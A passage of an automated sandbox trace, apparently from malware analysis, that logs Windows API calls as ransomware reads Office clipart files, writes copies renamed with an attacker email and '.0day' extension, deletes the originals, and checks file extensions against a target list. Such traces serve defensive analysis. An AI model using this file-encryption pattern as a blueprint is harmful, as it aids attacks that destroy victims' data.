files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.626] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=2052) returned 1 [0274.626] CloseHandle (hObject=0x318) returned 1 [0274.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf")) returned 0x20 [0274.626] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.627] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.627] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0274.627] GetLastError () returned 0x0 [0274.627] ReadFile (in: hFile=0x318, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x804, lpOverlapped=0x0) returned 1 [0274.639] WriteFile (in: hFile=0x300, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x810, lpOverlapped=0x0) returned 1 [0274.640] ReadFile (in: hFile=0x318, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.640] WriteFile (in: hFile=0x300, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.640] SetEndOfFile (hFile=0x300) returned 1 [0274.674] CloseHandle (hObject=0x300) returned 1 [0274.674] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.675] SetEndOfFile (hFile=0x318) returned 1 [0274.677] CloseHandle (hObject=0x318) returned 1 [0274.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.677] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf")) returned 1 [0274.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.677] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.677] lstrlenW (lpString=".doc") returned 4 [0274.677] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.677] lstrlenW (lpString=".docx") returned 5 [0274.677] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.677] lstrlenW (lpString=".pdf") returned 4 [0274.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString=".xls") returned 4 [0274.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.678] lstrlenW (lpString=".xlsx") returned 5 [0274.678] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.678] lstrlenW (lpString=".ppt") returned 4 [0274.678] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.678] lstrlenW (lpString=".zip") returned 4 [0274.678] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.678] lstrlenW (lpString=".rar") returned 4 [0274.678] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString=".bz2") returned 4 [0274.678] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString=".7z") returned 3 [0274.678] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.678] lstrlenW (lpString=".dbf") returned 4 [0274.678] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.678] lstrlenW (lpString=".1cd") returned 4 [0274.678] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.678] lstrlenW (lpString=".jpg") returned 4 [0274.678] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.678] lstrlenW (lpString=".doc") returned 4 [0274.678] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString=".docx") returned 5 [0274.678] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.678] lstrlenW (lpString=".pdf") returned 4 [0274.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.678] lstrlenW (lpString=".xls") returned 4 [0274.679] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.679] lstrlenW (lpString=".xlsx") returned 5 [0274.679] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.679] lstrlenW (lpString=".ppt") returned 4 [0274.679] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.679] lstrlenW (lpString=".zip") returned 4 [0274.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.679] lstrlenW (lpString=".rar") returned 4 [0274.679] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.679] lstrlenW (lpString=".bz2") returned 4 [0274.679] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.679] lstrlenW (lpString=".7z") returned 3 [0274.679] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.679] lstrlenW (lpString=".dbf") returned 4 [0274.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.679] lstrlenW (lpString=".1cd") returned 4 [0274.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0274.679] lstrlenW (lpString=".jpg") returned 4 [0274.679] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.679] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.679] lstrlenW (lpString="DD01176_.WMF") returned 12 [0274.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.680] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=1888) returned 1 [0274.680] CloseHandle (hObject=0x318) returned 1 [0274.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf")) returned 0x20 [0274.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.680] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.680] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0274.680] GetLastError () returned 0x0 [0274.680] ReadFile (in: hFile=0x318, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x760, lpOverlapped=0x0) returned 1 [0274.682] WriteFile (in: hFile=0x300, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x770, lpOverlapped=0x0) returned 1 [0274.683] ReadFile (in: hFile=0x318, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.683] WriteFile (in: hFile=0x300, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.683] SetEndOfFile (hFile=0x300) returned 1 [0274.683] CloseHandle (hObject=0x300) returned 1 [0274.683] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.683] SetEndOfFile (hFile=0x318) returned 1 [0274.686] CloseHandle (hObject=0x318) returned 1 [0274.686] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.686] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf")) returned 1 [0274.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.686] lstrlenW (lpString=".doc") returned 4 [0274.686] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.686] lstrlenW (lpString=".docx") returned 5 [0274.686] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.686] lstrlenW (lpString=".pdf") returned 4 [0274.686] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.686] lstrlenW (lpString=".xls") returned 4 [0274.686] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.687] lstrlenW (lpString=".xlsx") returned 5 [0274.687] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.687] lstrlenW (lpString=".ppt") returned 4 [0274.687] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.687] lstrlenW (lpString=".zip") returned 4 [0274.687] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.687] lstrlenW (lpString=".rar") returned 4 [0274.687] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.687] lstrlenW (lpString=".bz2") returned 4 [0274.687] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.687] lstrlenW (lpString=".7z") returned 3 [0274.687] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.687] lstrlenW (lpString=".dbf") returned 4 [0274.687] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.687] lstrlenW (lpString=".1cd") returned 4 [0274.687] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.687] lstrlenW (lpString=".jpg") returned 4 [0274.687] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.687] lstrlenW (lpString=".doc") returned 4 [0274.687] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.687] lstrlenW (lpString=".docx") returned 5 [0274.687] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.687] lstrlenW (lpString=".pdf") returned 4 [0274.687] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.687] lstrlenW (lpString=".xls") returned 4 [0274.687] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.687] lstrlenW (lpString=".xlsx") returned 5 [0274.688] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.688] lstrlenW (lpString=".ppt") returned 4 [0274.688] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.688] lstrlenW (lpString=".zip") returned 4 [0274.688] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.688] lstrlenW (lpString=".rar") returned 4 [0274.688] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.688] lstrlenW (lpString=".bz2") returned 4 [0274.688] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.688] lstrlenW (lpString=".7z") returned 3 [0274.688] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.688] lstrlenW (lpString=".dbf") returned 4 [0274.688] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.688] lstrlenW (lpString=".1cd") returned 4 [0274.688] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0274.688] lstrlenW (lpString=".jpg") returned 4 [0274.688] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.688] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.688] lstrlenW (lpString="DD01178_.WMF") returned 12 [0274.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.689] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=3796) returned 1 [0274.689] CloseHandle (hObject=0x318) returned 1 [0274.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf")) returned 0x20 [0274.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.689] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.689] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0274.691] GetLastError () returned 0x0 [0274.691] ReadFile (in: hFile=0x318, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0xed4, lpOverlapped=0x0) returned 1 [0274.805] WriteFile (in: hFile=0x300, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xee0, lpOverlapped=0x0) returned 1 [0274.806] ReadFile (in: hFile=0x318, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.806] WriteFile (in: hFile=0x300, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.806] SetEndOfFile (hFile=0x300) returned 1 [0274.806] CloseHandle (hObject=0x300) returned 1 [0274.806] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.806] SetEndOfFile (hFile=0x318) returned 1 [0274.809] CloseHandle (hObject=0x318) returned 1 [0274.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.852] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf")) returned 1 [0274.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.853] lstrlenW (lpString=".doc") returned 4 [0274.853] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.853] lstrlenW (lpString=".docx") returned 5 [0274.853] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.853] lstrlenW (lpString=".pdf") returned 4 [0274.853] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.853] lstrlenW (lpString=".xls") returned 4 [0274.853] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.853] lstrlenW (lpString=".xlsx") returned 5 [0274.853] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.853] lstrlenW (lpString=".ppt") returned 4 [0274.853] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.853] lstrlenW (lpString=".zip") returned 4 [0274.853] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.853] lstrlenW (lpString=".rar") returned 4 [0274.853] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.853] lstrlenW (lpString=".bz2") returned 4 [0274.853] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.853] lstrlenW (lpString=".7z") returned 3 [0274.853] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.853] lstrlenW (lpString=".dbf") returned 4 [0274.853] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.853] lstrlenW (lpString=".1cd") returned 4 [0274.853] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.854] lstrlenW (lpString=".jpg") returned 4 [0274.854] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.854] lstrlenW (lpString=".doc") returned 4 [0274.854] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.854] lstrlenW (lpString=".docx") returned 5 [0274.854] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.854] lstrlenW (lpString=".pdf") returned 4 [0274.854] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.854] lstrlenW (lpString=".xls") returned 4 [0274.854] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.854] lstrlenW (lpString=".xlsx") returned 5 [0274.854] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.854] lstrlenW (lpString=".ppt") returned 4 [0274.854] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.854] lstrlenW (lpString=".zip") returned 4 [0274.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.854] lstrlenW (lpString=".rar") returned 4 [0274.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.854] lstrlenW (lpString=".bz2") returned 4 [0274.854] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.854] lstrlenW (lpString=".7z") returned 3 [0274.854] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.854] lstrlenW (lpString=".dbf") returned 4 [0274.854] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.854] lstrlenW (lpString=".1cd") returned 4 [0274.854] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0274.854] lstrlenW (lpString=".jpg") returned 4 [0274.854] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.855] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.855] lstrlenW (lpString="DD01585_.WMF") returned 12 [0274.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.855] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=2524) returned 1 [0274.855] CloseHandle (hObject=0x37c) returned 1 [0274.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf")) returned 0x20 [0274.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 